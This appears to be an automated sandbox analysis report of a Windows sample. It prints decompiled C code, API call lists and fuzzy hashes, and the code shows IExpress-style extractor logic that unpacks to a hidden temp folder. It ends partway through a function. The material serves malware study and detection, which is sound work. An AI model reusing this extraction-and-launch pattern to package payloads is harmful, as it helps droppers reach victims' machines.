                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: 96774fc2334e9f50b9fba341b4d222573f06be09083e71e7dbebc99e2632d3d8
                                                                                                                                                                                                      • Instruction ID: bb7c5a1e5d74bd3aebcdf69ab2d16843c506333a4b944c0d88f2ad584158cab2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96774fc2334e9f50b9fba341b4d222573f06be09083e71e7dbebc99e2632d3d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 371129313003415FD721ABB7AC48A2F77A9DB94384B09A02DFA0CF3251DA30DC859661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E76F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E00E76EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00E76F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: d4c767c87ef2d538ca6c04d3b075b2898a757fe8a3b553693bc0e028ce47d6a1
                                                                                                                                                                                                      • Instruction ID: 336b5488044b6bc0f5233cbdce74d078bf34dc5c7eb17a23ffdb12457ff992fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4c767c87ef2d538ca6c04d3b075b2898a757fe8a3b553693bc0e028ce47d6a1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 529002A42626004BA6505B719D1946975919B8D616BC5A470A019E4494DB6041849522
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00E755A0(void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E00E7468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E00E7468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0xe79a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0xe78b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0xe78a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E00E76517(_t82, 0x7d2, 0, E00E73210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe79a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0xe791e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0xe791e4);
                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                      										E00E71781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t68 = E00E76952( &_v268);
                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                      																			_t49 = E00E7597D( &_v268, _t103, 1);
                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                      																				L33:
                                                                                                                                                                                                      																				_t50 = E00E72630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                      																				E00E7658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                      																					_t109 = 0xe791e4;
                                                                                                                                                                                                      																					E00E71781(0xe791e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                      																					_t59 = E00E75467(0xe791e4, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E00E72630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t67 = E00E7597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E00E75467(0xe791e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0xe791e4;
                                                                                                                                                                                                      											_t70 = E00E72630(0, 0xe791e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0xe791e4;
                                                                                                                                                                                                      												_t71 = E00E75467(0xe791e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E00E7597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe78b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E00E75467(0xe78b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E00E744B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E00E76CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00e756f3
                                                                                                                                                                                                      0x00e756f3
                                                                                                                                                                                                      0x00e75705
                                                                                                                                                                                                      0x00e7570a
                                                                                                                                                                                                      0x00e75711
                                                                                                                                                                                                      0x00e75717
                                                                                                                                                                                                      0x00e75724
                                                                                                                                                                                                      0x00e75726
                                                                                                                                                                                                      0x00e75729
                                                                                                                                                                                                      0x00e75730
                                                                                                                                                                                                      0x00e75737
                                                                                                                                                                                                      0x00e7573d
                                                                                                                                                                                                      0x00e75740
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7572b
                                                                                                                                                                                                      0x00e7572b
                                                                                                                                                                                                      0x00e7572e
                                                                                                                                                                                                      0x00e75742
                                                                                                                                                                                                      0x00e75742
                                                                                                                                                                                                      0x00e75745
                                                                                                                                                                                                      0x00e7576b
                                                                                                                                                                                                      0x00e7576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75747
                                                                                                                                                                                                      0x00e75747
                                                                                                                                                                                                      0x00e7574d
                                                                                                                                                                                                      0x00e7574f
                                                                                                                                                                                                      0x00e75771
                                                                                                                                                                                                      0x00e75771
                                                                                                                                                                                                      0x00e75773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75751
                                                                                                                                                                                                      0x00e75751
                                                                                                                                                                                                      0x00e75753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75755
                                                                                                                                                                                                      0x00e7575b
                                                                                                                                                                                                      0x00e75760
                                                                                                                                                                                                      0x00e75762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75764
                                                                                                                                                                                                      0x00e75764
                                                                                                                                                                                                      0x00e75769
                                                                                                                                                                                                      0x00e7577e
                                                                                                                                                                                                      0x00e7577e
                                                                                                                                                                                                      0x00e75781
                                                                                                                                                                                                      0x00e75788
                                                                                                                                                                                                      0x00e7578d
                                                                                                                                                                                                      0x00e7578f
                                                                                                                                                                                                      0x00e757b2
                                                                                                                                                                                                      0x00e757b8
                                                                                                                                                                                                      0x00e757bd
                                                                                                                                                                                                      0x00e757bf
                                                                                                                                                                                                      0x00e757cd
                                                                                                                                                                                                      0x00e757cd
                                                                                                                                                                                                      0x00e757dd
                                                                                                                                                                                                      0x00e757e3
                                                                                                                                                                                                      0x00e757ef
                                                                                                                                                                                                      0x00e757f5
                                                                                                                                                                                                      0x00e757f8
                                                                                                                                                                                                      0x00e7580a
                                                                                                                                                                                                      0x00e7580a
                                                                                                                                                                                                      0x00e757fa
                                                                                                                                                                                                      0x00e75802
                                                                                                                                                                                                      0x00e75802
                                                                                                                                                                                                      0x00e7580d
                                                                                                                                                                                                      0x00e7580f
                                                                                                                                                                                                      0x00e75830
                                                                                                                                                                                                      0x00e75836
                                                                                                                                                                                                      0x00e7583d
                                                                                                                                                                                                      0x00e7584b
                                                                                                                                                                                                      0x00e75851
                                                                                                                                                                                                      0x00e75855
                                                                                                                                                                                                      0x00e7585a
                                                                                                                                                                                                      0x00e7585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7585e
                                                                                                                                                                                                      0x00e7585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7585e
                                                                                                                                                                                                      0x00e75811
                                                                                                                                                                                                      0x00e75817
                                                                                                                                                                                                      0x00e75819
                                                                                                                                                                                                      0x00e7581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7581f
                                                                                                                                                                                                      0x00e75791
                                                                                                                                                                                                      0x00e75797
                                                                                                                                                                                                      0x00e7579c
                                                                                                                                                                                                      0x00e7579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e757a0
                                                                                                                                                                                                      0x00e757a9
                                                                                                                                                                                                      0x00e757ae
                                                                                                                                                                                                      0x00e757b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e757b0
                                                                                                                                                                                                      0x00e7579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75769
                                                                                                                                                                                                      0x00e75762
                                                                                                                                                                                                      0x00e75753
                                                                                                                                                                                                      0x00e7574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75864
                                                                                                                                                                                                      0x00e75864
                                                                                                                                                                                                      0x00e75864
                                                                                                                                                                                                      0x00e75717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756c3
                                                                                                                                                                                                      0x00e756c5
                                                                                                                                                                                                      0x00e756c9
                                                                                                                                                                                                      0x00e756ce
                                                                                                                                                                                                      0x00e756d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756d6
                                                                                                                                                                                                      0x00e756d6
                                                                                                                                                                                                      0x00e756d8
                                                                                                                                                                                                      0x00e756dd
                                                                                                                                                                                                      0x00e756df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756e1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00E755CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00E75638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00E7564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E75620
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E756B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00E7571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00E75737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00E757CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00E757EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00E75802
                                                                                                                                                                                                        • Part of subcall function 00E72630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00E72654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00E75830
                                                                                                                                                                                                        • Part of subcall function 00E76517: FindResourceA.KERNEL32(00E70000,000007D6,00000005), ref: 00E7652A
                                                                                                                                                                                                        • Part of subcall function 00E76517: LoadResource.KERNEL32(00E70000,00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E76538
                                                                                                                                                                                                        • Part of subcall function 00E76517: DialogBoxIndirectParamA.USER32(00E70000,00000000,00000547,00E719E0,00000000), ref: 00E76557
                                                                                                                                                                                                        • Part of subcall function 00E76517: FreeResource.KERNEL32(00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E76560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00E75878
                                                                                                                                                                                                        • Part of subcall function 00E7597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E759A8
                                                                                                                                                                                                        • Part of subcall function 00E7597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00E759AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-559629209
                                                                                                                                                                                                      • Opcode ID: 8c45f617c0db0cd918481224139cb7167052373db317ba7c1d7eb92ef186de36
                                                                                                                                                                                                      • Instruction ID: 0311a8895efcf5c969928848eb2958fb93b48c1ccc7e6ca24638a5a8a69c3039
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c45f617c0db0cd918481224139cb7167052373db317ba7c1d7eb92ef186de36
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83812C72A04A049BDB24EB759C45BEE72AD9F60304F04A4B6F58EF2191EFF08DC58A51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph
                                                                                                                                                                                                      • Function at e744b9 (calls LoadStringA, MessageBoxA, LocalAlloc, MessageBeep, LocalFree); graph not reproduced
                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
